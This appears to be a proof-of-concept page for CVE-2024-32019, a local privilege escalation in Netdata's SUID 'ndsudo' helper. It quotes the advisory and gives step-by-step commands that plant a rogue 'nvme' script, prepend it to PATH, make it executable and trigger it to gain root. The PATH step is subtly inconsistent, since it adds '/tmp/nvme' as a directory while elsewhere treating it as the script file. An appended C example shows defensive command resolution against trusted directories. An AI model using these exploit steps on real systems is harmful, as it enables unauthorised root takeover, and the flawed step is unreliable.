CVE-2024-32019 PoC — ndsudo: local privilege escalation via untrusted search path

Source
Associated Vulnerability
Title: ndsudo: local privilege escalation via untrusted search path (CVE-2024-32019)
Description: Netdata is an open source observability tool. The `ndsudo` tool shipped with affected versions of the Netdata Agent allows an attacker to run arbitrary programs with root permissions. The `ndsudo` tool is packaged as a `root`-owned executable with the SUID bit set. It only runs a restricted set of external commands, but its search paths are supplied by the `PATH` environment variable. This allows an attacker to control where `ndsudo` looks for these commands, which may be a path the attacker has write access to. This may lead to local privilege escalation. This vulnerability has been addressed in versions 1.45.3 and 1.45.2-169. Users are advised to upgrade. There are no known workarounds for this vulnerability.
Description
This is an alternative PoC for CVE-2024-32019, written in Python.
Readme
# Privilege Escalation via `ndsudo` (Netdata Local Exploit)

This is an alternative PoC that exploits a vulnerable `ndsudo` utility bundled with Netdata to perform a local privilege escalation.
The exploit works by placing a script named after a command that `ndsudo` allows (`nvme`) in a location on the user's `PATH`, so that `ndsudo` finds it and executes it as root.

---

## Prerequisites & Assumptions :scroll:

- **Local shell access** on the target system.
- Python 3 on the target machine.
- Ability to execute the `ndsudo` command.

---

## Steps

### 1. Script :hammer:

You can either create the script on the target machine or upload it there, as long as it is named after one of the allowed commands.
To list the commands `ndsudo` allows, run `ndsudo --help`.

This PoC uses the `nvme-list` command, so the script is named `nvme`.

---
### 2. PATH injection :syringe:

Once the script has been created and named after a command allowed by `ndsudo`, it has to be injected at the beginning of the `PATH` variable so that it is the first match found and executed:

```bash
export PATH="/tmp/nvme:$PATH"
```
---
### 3. Execution permissions :gun:

Obviously, the script needs execute permission:
```bash
chmod +x /tmp/nvme
```
---
### 4. Trigger the Exploit :boom:

Once everything is set up, just launch `ndsudo` with the rogue script and you're root.

```bash
ndsudo nvme-list
```
---

## Resources :books:

- Netdata Github Advisory: https://github.com/netdata/netdata/security/advisories/GHSA-pmhq-4cxq-wj93


Hack responsibly :skull:
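
For the defensive side of the search-path issue described in the advisory text above, this added example (not code from the PoC author or from Netdata, and not a reproduction of Netdata's actual fix) shows how a SUID helper can resolve an allow-listed command name against fixed directories instead of the caller's `PATH`. The directory list and the function names are assumptions made for illustration.

```c
#include <stdio.h>
#include <string.h>
#include <sys/stat.h>

/* Assumed trusted directories: root-owned system locations fixed at build time. */
static const char *const TRUSTED_DIRS[] = {
    "/usr/sbin", "/usr/bin", "/sbin", "/bin", NULL
};

/* Accept only a regular, executable file owned by root that
 * neither group nor others can modify. */
static int is_trusted_binary(const char *path) {
    struct stat st;
    if (stat(path, &st) != 0) return 0;
    if (!S_ISREG(st.st_mode)) return 0;
    if (st.st_uid != 0) return 0;
    if (st.st_mode & (S_IWGRP | S_IWOTH)) return 0;
    return (st.st_mode & S_IXUSR) != 0;
}

/* Resolve a bare command name to an absolute path without consulting
 * the caller's PATH. Returns 0 on success, -1 otherwise (out is emptied). */
int resolve_trusted(const char *name, char *out, size_t outlen) {
    if (outlen > 0) out[0] = '\0';
    if (name == NULL || *name == '\0' || strchr(name, '/') != NULL)
        return -1;                       /* bare names only, no paths */
    for (size_t i = 0; TRUSTED_DIRS[i] != NULL; i++) {
        int n = snprintf(out, outlen, "%s/%s", TRUSTED_DIRS[i], name);
        if (n < 0 || (size_t)n >= outlen) continue;   /* would truncate */
        if (is_trusted_binary(out)) return 0;
    }
    if (outlen > 0) out[0] = '\0';
    return -1;
}

int main(int argc, char **argv) {
    char path[4096];
    const char *cmd = argc > 1 ? argv[1] : "nvme";
    if (resolve_trusted(cmd, path, sizeof path) != 0) {
        fprintf(stderr, "%s: not found in trusted directories\n", cmd);
        return 1;
    }
    /* A privileged helper would pass this path to execv(), never execvp(),
     * because execvp() searches the PATH inherited from the caller. */
    printf("%s\n", path);
    return 0;
}
```

The ownership and mode check is made on the file only; a real helper should also make sure the directories themselves are root-owned and not writable by others.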